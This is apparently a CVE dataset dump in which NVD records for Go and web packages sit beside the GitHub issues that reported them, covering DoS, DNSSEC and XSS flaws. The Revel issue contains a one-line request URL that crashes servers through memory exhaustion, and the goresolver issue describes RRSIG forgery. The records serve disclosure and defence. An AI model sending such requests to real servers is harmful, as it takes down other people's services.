I believe so
#### What operating system are you using (such as macOS, Linux and Windows)?
Linux
#### What did you do?
I found a way to get access to data I shouldn't get access to.
#### What did you expect to see?
An error message
#### What did you see instead?
Data I shouldn't get access
#### Additional context
<!-- Add any other context about the problem here. -->
Hi,
I found a vulnerability in your framework, let me know what is the best way to handle this.
Best,
Louis
| Vulnerability | https://api.github.com/repos/go-aah/aah/issues/266/comments | 4 | 2020-03-03T03:35:48Z | 2020-03-03T10:08:37Z | https://github.com/go-aah/aah/issues/266 | 574,393,583 | 266 | 4,557 |
CVE-2020-36568 | 2022-12-27T22:15:11.783 | Unsanitized input in the query parser in github.com/revel/revel before v1.0.0 allows remote attackers to cause resource exhaustion via memory allocation. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@golang.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/revel/revel/commit/d160ecb72207824005b19778594cbdc272e8a605"
},
{
"source": "security@golang.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/revel/revel/issues/1424"
},
{
"source": "security@golang.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/revel/revel/pull/1427"
},
{
"source": "security@golang.org",
"tags": [
"Third Party Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0003"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/revel/revel/commit/d160ecb72207824005b19778594cbdc272e8a605"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/revel/revel/issues/1424"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/revel/revel/pull/1427"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0003"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:revel:revel:*:*:*:*:*:go:*:*",
"matchCriteriaId": "92050CBF-8549-4C5A-8C50-BCEA5A29847F",
"versionEndExcluding": "1.0.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/revel/revel/issues/1424 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"revel",
"revel"
] | Once the [slices parameter](https://revel.github.io/manual/parameters.html#slices) feature is used, the website will be suffering from DoS attack.
When we need to get a slice parameter, we may use the following code snippet in our controller.
```golang
func (c App) DoS1(name []string) revel.Result {
return c.RenderText(fmt.Sprint(name))
}
func (c App) DoS2() revel.Result {
var name []string
c.Params.Bind(&name, "name")
return c.RenderText(fmt.Sprint(name))
}
```
It looks like everything is OK. However, we can exhaust the server's MEM with only one request.
e.g., when simply visit `http://localhost:9000/dos1?name[1234567890]=1`, the server's CPU and memory usage will soar, and the OOM killer will be triggered eventually.
This vulnerability was caused by the following code:
https://github.com/revel/revel/blob/a3d7a7c23ca885cc5036d3641ede49ce4a14ee2e/binder.go#L210-L277
When the function above is invoked, Revel will calc the `maxIndex` from user's input, and thus the attacker could make the `maxIndex` as large as possible. When `reflect.MakeSlice` is called, Golang will alloc a large memory as the `maxIndex` needed.
A possible solution for this vuln is to specify the upper bound of the `maxIndex` in the code or config file.
Before the problem is fixed, plz avoid using the slices parameter feature. | DoS vulnerability in Revel framework | https://api.github.com/repos/revel/revel/issues/1424/comments | 7 | 2019-03-05T08:58:09Z | 2022-03-05T16:12:51Z | https://github.com/revel/revel/issues/1424 | 417,186,011 | 1,424 | 4,558 |
CVE-2020-36562 | 2022-12-28T03:15:09.490 | Due to unchecked type assertions, maliciously crafted messages can cause panics, which may be used as a denial of service vector. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@golang.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/shiyanhui/dht/issues/57"
},
{
"source": "security@golang.org",
"tags": [
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0040"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/shiyanhui/dht/issues/57"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2020-0040"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dht_project:dht:-:*:*:*:*:go:*:*",
"matchCriteriaId": "AD614341-DF86-402D-9078-2DBB77DEF035",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"617"
] | 617 | https://github.com/shiyanhui/dht/issues/57 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"shiyanhui",
"dht"
] | At the begining of `krpc.go:handleRequest()`, several unchecked type assertions are made to the values of the parsed bencoded udp packet.
(line 428) `t := response["t"].(string)`
(line 445) `id := a["id"].(string)`
... and others ...
An illegal packet that contains a bencode integer instead of a string in the `id` field would trigger a panic because the [type assertion is not checked](https://play.golang.org/p/aIBOaPyVmT8) and [recover()](https://blog.golang.org/defer-panic-and-recover) is not used. Therefore a malicious packet can crash the process.
I don't know how much of a problem this is though. | Potential panic caused by illegal incoming packet | https://api.github.com/repos/shiyanhui/dht/issues/57/comments | 0 | 2020-04-29T21:27:05Z | 2021-01-07T22:41:04Z | https://github.com/shiyanhui/dht/issues/57 | 609,371,164 | 57 | 4,559 |
CVE-2022-3346 | 2022-12-28T03:15:10.140 | DNSSEC validation is not performed correctly. An attacker can cause this package to report successful validation for invalid, attacker-controlled records. The owner name of RRSIG RRs is not validated, permitting an attacker to present the RRSIG for an attacker-controlled domain in a response for any other domain. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@golang.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/peterzen/goresolver/issues/5"
},
{
"source": "security@golang.org",
"tags": [
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2022-0979"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/peterzen/goresolver/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2022-0979"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:go-resolver_project:go-resolver:-:*:*:*:*:go:*:*",
"matchCriteriaId": "13326050-272D-4B2E-9469-839B63614913",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"345"
] | 345 | https://github.com/peterzen/goresolver/issues/5 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"peterzen",
"goresolver"
] | The RRSIG's header name specifies the signer of this signature record. For the leaf query, it should be equal to the FQDN of the querying domain name. e.g. If I query for A records for example.com, I should get back an RRSIG with header name `example.com.`. Then I follow the auth chain of that name to verify the chain of trust.
However, this library didn't check the equality between the return RRSIG header name, and is using it directly for checking the chain of trust. This means, an attacker can forge RRSIG for any domain by owning a valid domain name. e.g. when a victim query for A records for example.com, an attacker who owns pwn.com can generate a signature for a fake RR response set using its valid DNSKEY, and attach the RRSIG with header name of pwn.com and send it back to the victim. Because this library takes the RRSIG header name without any checks, it query for DNSKEY for pwn.com and use that key to verify the RR set that should answer the query for example.com, and the check would pass. | RRSIG name was not being checked | https://api.github.com/repos/peterzen/goresolver/issues/5/comments | 3 | 2022-06-08T03:55:35Z | 2024-01-02T17:27:15Z | https://github.com/peterzen/goresolver/issues/5 | 1,264,154,459 | 5 | 4,560 |
CVE-2022-3347 | 2022-12-28T03:15:10.193 | DNSSEC validation is not performed correctly. An attacker can cause this package to report successful validation for invalid, attacker-controlled records. Root DNSSEC public keys are not validated, permitting an attacker to present a self-signed root key and delegation chain. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security@golang.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/peterzen/goresolver/issues/5#issuecomment-1150214257"
},
{
"source": "security@golang.org",
"tags": [
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2022-1026"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/peterzen/goresolver/issues/5#issuecomment-1150214257"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://pkg.go.dev/vuln/GO-2022-1026"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:go-resolver_project:go-resolver:-:*:*:*:*:go:*:*",
"matchCriteriaId": "13326050-272D-4B2E-9469-839B63614913",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"345"
] | 345 | https://github.com/peterzen/goresolver/issues/5#issuecomment-1150214257 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"peterzen",
"goresolver"
] | The RRSIG's header name specifies the signer of this signature record. For the leaf query, it should be equal to the FQDN of the querying domain name. e.g. If I query for A records for example.com, I should get back an RRSIG with header name `example.com.`. Then I follow the auth chain of that name to verify the chain of trust.
However, this library didn't check the equality between the return RRSIG header name, and is using it directly for checking the chain of trust. This means, an attacker can forge RRSIG for any domain by owning a valid domain name. e.g. when a victim query for A records for example.com, an attacker who owns pwn.com can generate a signature for a fake RR response set using its valid DNSKEY, and attach the RRSIG with header name of pwn.com and send it back to the victim. Because this library takes the RRSIG header name without any checks, it query for DNSKEY for pwn.com and use that key to verify the RR set that should answer the query for example.com, and the check would pass. | RRSIG name was not being checked | https://api.github.com/repos/peterzen/goresolver/issues/5/comments | 3 | 2022-06-08T03:55:35Z | 2024-01-02T17:27:15Z | https://github.com/peterzen/goresolver/issues/5 | 1,264,154,459 | 5 | 4,561 |
CVE-2022-46174 | 2022-12-28T07:15:08.860 | efs-utils is a set of Utilities for Amazon Elastic File System (EFS). A potential race condition issue exists within the Amazon EFS mount helper in efs-utils versions v1.34.3 and below. When using TLS to mount file systems, the mount helper allocates a local port for stunnel to receive NFS connections prior to applying the TLS tunnel. In affected versions, concurrent mount operations can allocate the same local port, leading to either failed mount operations or an inappropriate mapping from an EFS customer’s local mount points to that customer’s EFS file systems. This issue is patched in version v1.34.4. There is no recommended work around. We recommend affected users update the installed version of efs-utils to v1.34.4 or later. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 2.5,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/aws/efs-utils/commit/f3a8f88167d55caa2f78aeb72d4dc1987a9ed62d"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/aws/efs-utils/issues/125"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/aws/efs-utils/security/advisories/GHSA-4fv8-w65m-3932"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/aws/efs-utils/commit/f3a8f88167d55caa2f78aeb72d4dc1987a9ed62d"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/aws/efs-utils/issues/125"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/aws/efs-utils/security/advisories/GHSA-4fv8-w65m-3932"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:amazon:efs-utils:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F40EC4D8-9E3D-402D-B095-CCD5D8DCD6EF",
"versionEndExcluding": "1.34.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:amazon:elastic_file_system_container_storage_interface_driver:*:*:*:*:*:go:*:*",
"matchCriteriaId": "43EBB724-0B0C-49E4-B312-2154D1800F2D",
"versionEndExcluding": "1.4.8",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"362"
] | 362 | https://github.com/aws/efs-utils/issues/125 | [
"Third Party Advisory"
] | github.com | [
"aws",
"efs-utils"
] | We're encountering problems when trying to mount multiple EFS volumes at once. The mount process gets stuck, when trying to debug RPC there are occassional `nfs: server 127.0.0.1 not responding, timed out` errors in the log (not sure if those are related -- the mount.efs should retry AFAIK). The stunnel processes serving the mount RPC connections seem to be just waiting for for connection but nothing happens.
This problem has been observed only with Centos 8 (or Centos Streams 8) running stunnel-5.56-5.el8_3 and openssl-libs-1.1.1k-5.el8_5. When trying Amazon Linux 2 with stunnel-4.56-6.amzn2.0.3 and openssl-libs-1.0.2k-19.amzn2.2.0.10 everything works OK. I suspected this is a race in stunnel, so I've tried to recompile stunnel-5.56-5 and install it on Amazon Linux 2 but the issue is again not reproducible, so it's not stunnel (or not stunnel itself).
The issue seems to be also quite timing-sensitive. Increasing log level or changing stunnel options seems to have effect on probability of the problem to show. I've tried to remove PID file creation (since the issue #112 looked quite similar) but it doesn't seem to help -- I can still see the pending mounts. I also suspected the issue #105, but even if I fixed that (I hope -- PR #119) the mounts still get stuck.
I wonder if the problem in issue #114 is related: we're mostly encountering this problem through efs-csi-driver on kubernetes clusters when creating and removing multiple EFS volumes in the cluster in one shot.
I'm curious if somebody had more insight or encountered the problem: it looks like it's the combination of multiple factors that cause this and I failed to find any interesting debugging clues. | Mounting several volumes at once fails very frequently | https://api.github.com/repos/aws/efs-utils/issues/125/comments | 14 | 2022-03-23T12:45:54Z | 2023-02-07T22:51:11Z | https://github.com/aws/efs-utils/issues/125 | 1,178,072,087 | 125 | 4,562 |
CVE-2018-25055 | 2022-12-28T12:15:08.820 | A vulnerability was found in FarCry Solr Pro Plugin up to 1.5.x. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file packages/forms/solrProSearch.cfc of the component Search Handler. The manipulation of the argument suggestion leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.6.0 is able to address this issue. The name of the patch is b8f3d61511c9b02b781ec442bfb803cbff8e08d5. It is recommended to upgrade the affected component. The identifier VDB-216961 was assigned to this vulnerability. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jeffcoughlin/farcrysolrpro/commit/b8f3d61511c9b02b781ec442bfb803cbff8e08d5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jeffcoughlin/farcrysolrpro/issues/78"
},
{
"source": "cna@vuldb.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/jeffcoughlin/farcrysolrpro/releases/tag/1.6.0"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216961"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216961"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/jeffcoughlin/farcrysolrpro/commit/b8f3d61511c9b02b781ec442bfb803cbff8e08d5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jeffcoughlin/farcrysolrpro/issues/78"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/jeffcoughlin/farcrysolrpro/releases/tag/1.6.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216961"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216961"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:farcry_solr_pro_project:farcry_solr_pro:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3323CC15-D43C-4AE6-90DF-2ECB9ADFD0C8",
"versionEndExcluding": null,
"versionEndIncluding": "1.5.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/jeffcoughlin/farcrysolrpro/issues/78 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jeffcoughlin",
"farcrysolrpro"
] | Hello,
I've hit a couple of XSS issues with search result pages using the Solr Pro Farcry plugin. Escaping the 'q' variable with "encodeForHTML()" does a great job, but I was notified this morning that I hadn't found the bottom of the turtle stack and was escaping an href as well.
I don't mind digging through code, but perhaps it would expedite to ask if there is a single place we could escape the search query before it's branched off to all the code it is passed to?
Thanks for any assistance. | XSS Concern | https://api.github.com/repos/jeffcoughlin/farcrysolrpro/issues/78/comments | 2 | 2018-03-12T17:44:52Z | 2018-09-04T18:08:16Z | https://github.com/jeffcoughlin/farcrysolrpro/issues/78 | 304,473,947 | 78 | 4,563 |
CVE-2022-4820 | 2022-12-28T21:15:10.703 | A vulnerability classified as problematic has been found in FlatPress. This affects an unknown part of the file admin/panels/entry/admin.entry.list.php of the component Admin Area. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 229752b51025e678370298284d42f8ebb231f67f. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216999. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/229752b51025e678370298284d42f8ebb231f67f"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/180"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216999"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216999"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/229752b51025e678370298284d42f8ebb231f67f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/180"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.216999"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216999"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flatpress:flatpress:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CD0F1B05-3B1E-4527-9AE3-488578A1ADCE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/flatpressblog/flatpress/issues/180 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"flatpressblog",
"flatpress"
] | Entry list in Admin Area allows for possible XSS due to unsufficient input sanitation. (Details follow.)
| Possible XSS in entry list | https://api.github.com/repos/flatpressblog/flatpress/issues/180/comments | 0 | 2022-12-25T19:31:47Z | 2022-12-25T19:33:01Z | https://github.com/flatpressblog/flatpress/issues/180 | 1,510,399,686 | 180 | 4,564 |
CVE-2022-4821 | 2022-12-28T21:15:10.840 | A vulnerability classified as problematic was found in FlatPress. This vulnerability affects the function onupload of the file admin/panels/uploader/admin.uploader.php of the component XML File Handler/MD File Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 3cc223dec5260e533a84b5cf5780d3a4fbf21241. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217000. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.4,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/3cc223dec5260e533a84b5cf5780d3a4fbf21241"
},
{
"source": "cna@vuldb.com",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/178"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.217000"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.217000"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/commit/3cc223dec5260e533a84b5cf5780d3a4fbf21241"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/flatpressblog/flatpress/issues/178"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.217000"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.217000"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:flatpress:flatpress:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CD0F1B05-3B1E-4527-9AE3-488578A1ADCE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/flatpressblog/flatpress/issues/178 | [
"Issue Tracking",
